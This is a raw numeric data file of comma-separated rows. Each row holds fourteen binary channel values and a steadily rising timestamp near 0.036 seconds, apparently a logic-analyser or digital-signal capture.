0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6144484e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6144508e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6144532e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6144540e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6144584e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6144608e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6144632e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6144660e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6144684e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6144708e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6144732e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6144756e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6144780e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6144808e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6144832e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6144860e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6144884e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6144908e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6144956e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6144980e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6144988e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6145008e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6145032e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6145060e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6145084e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6145108e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6145132e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6145156e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6145180e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6145208e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6145232e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6145260e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6145284e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6145308e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6145332e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6145356e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6145380e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6145388e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6145408e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6145432e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6145484e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6145508e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6145532e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6145556e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6145580e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6145608e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6145632e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6145660e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6145664e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6145708e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6145732e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6145756e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6145780e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6145808e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6145832e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6145860e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6145884e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6145908e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6145932e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6145984e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6146008e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6146012e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6146056e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6146080e-02 0,1,0,0,0,1,0,0,0,0,0,0,0,0,3.6146084e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6146088e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6146108e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6146132e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6146156e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6146180e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6146208e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6146228e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6146252e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6146284e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6146308e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6146332e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6146356e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6146380e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6146408e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6146432e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6146456e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6146484e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6146508e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6146532e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6146556e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6146580e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6146608e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6146632e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6146660e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6146684e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6146708e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6146732e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6146756e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6146780e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6146808e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6146832e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6146860e-02 0,1,0,0,0,0,0,0,0,1,0,0,0,0,3.6146884e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6146888e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6146932e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6146956e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6146964e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6146980e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6147008e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6147032e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6147060e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6147084e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6147108e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6147132e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6147156e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6147180e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6147208e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6147232e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6147260e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6147284e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6147308e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6147332e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6147356e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6147364e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6147380e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6147408e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6147460e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6147484e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6147492e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6147508e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6147532e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6147556e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6147580e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6147608e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6147632e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6147660e-02 0,1,0,0,0,0,0,0,0,1,0,0,0,0,3.6147684e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6147688e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6147708e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6147732e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6147756e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6147780e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6147836e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6147860e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6147884e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6147908e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6147932e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6147956e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6147964e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6147980e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6148008e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6148032e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6148060e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6148084e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6148108e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6148132e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6148156e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6148180e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6148208e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6148232e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6148252e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6148284e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6148308e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6148332e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6148356e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6148364e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6148408e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6148428e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6148440e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6148456e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6148480e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6148508e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6148532e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6148556e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6148580e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6148608e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6148628e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6148652e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6148680e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6148708e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6148732e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6148756e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6148780e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6148804e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6148828e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6148856e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6148880e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6148904e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6148932e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6148956e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6148980e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6149028e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6149056e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6149060e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6149080e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6149104e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6149132e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6149156e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6149180e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6149204e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6149228e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6149252e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6149280e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6149304e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6149332e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6149356e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6149380e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6149404e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6149428e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6149452e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6149480e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6149508e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6149532e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6149556e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6149580e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6149604e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6149628e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6149652e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6149680e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6149704e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6149732e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6149756e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6149780e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6149804e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6149828e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6149852e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6149880e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6149904e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6149932e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6149956e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6149980e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6150004e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6150028e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6150052e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6150080e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6150108e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6150132e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6150156e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6150180e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6150204e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6150228e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6150252e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,1,3.6274896e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,3.6275116e-02 1,1,0,0,0,0,0,0,0,0,0,1,0,1,3.6275144e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,3.6275172e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,3.6275460e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,3.6275492e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,3.6275516e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,3.6275540e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,3.6275564e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,3.6275588e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,3.6275612e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,3.6275636e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,3.6275688e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,1,3.6275716e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6275728e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6275740e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6275764e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6275772e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6275788e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6275812e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6275820e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6275864e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6275888e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6275896e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6275916e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6275940e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6275964e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6275988e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6276012e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6276036e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6276060e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6276088e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6276112e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6276140e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6276164e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6276188e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6276192e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6276236e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6276260e-02 1,1,0,0,0,1,0,0,0,0,0,0,0,0,3.6276268e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6276272e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6276288e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6276312e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6276340e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6276364e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6276388e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6276412e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6276436e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6276460e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6276468e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6276488e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6276512e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6276520e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6276540e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6276564e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6276588e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6276612e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6276636e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6276660e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6276688e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6276712e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6276740e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6276764e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6276812e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6276836e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6276844e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6276860e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6276888e-02 1,1,0,0,0,1,0,0,0,0,0,0,0,0,3.6276892e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6276896e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6276912e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6276940e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6276964e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6276988e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6277012e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6277036e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6277060e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6277088e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6277112e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6277140e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6277164e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6277188e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6277212e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6277236e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6277260e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6277288e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6277312e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6277340e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6277388e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6277412e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6277420e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6277436e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6277460e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6277488e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6277512e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6277540e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6277564e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6277568e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6277612e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6277636e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6277644e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6277660e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6277688e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6277712e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6277740e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6277764e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6277788e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6277836e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6277864e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6277868e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6277888e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6277912e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6277964e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6277988e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6277996e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6278012e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6278036e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6278060e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6278088e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6278112e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6278140e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6278164e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6278188e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6278212e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6278236e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6278260e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6278288e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6278312e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6278340e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6278364e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6278388e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6278412e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6278436e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6278460e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6278488e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6278512e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6278540e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6278564e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6278588e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6278612e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6278636e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6278660e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6278688e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6278712e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6278740e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6278764e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6278788e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6278792e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6278836e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6278864e-02 1,1,0,0,0,1,0,0,0,0,0,0,0,0,3.6278868e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6278872e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6278888e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6278912e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6278940e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6278964e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6278988e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6279012e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6279036e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6279060e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6279088e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6279112e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6279140e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6279164e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6279188e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6279212e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6279236e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6279260e-02 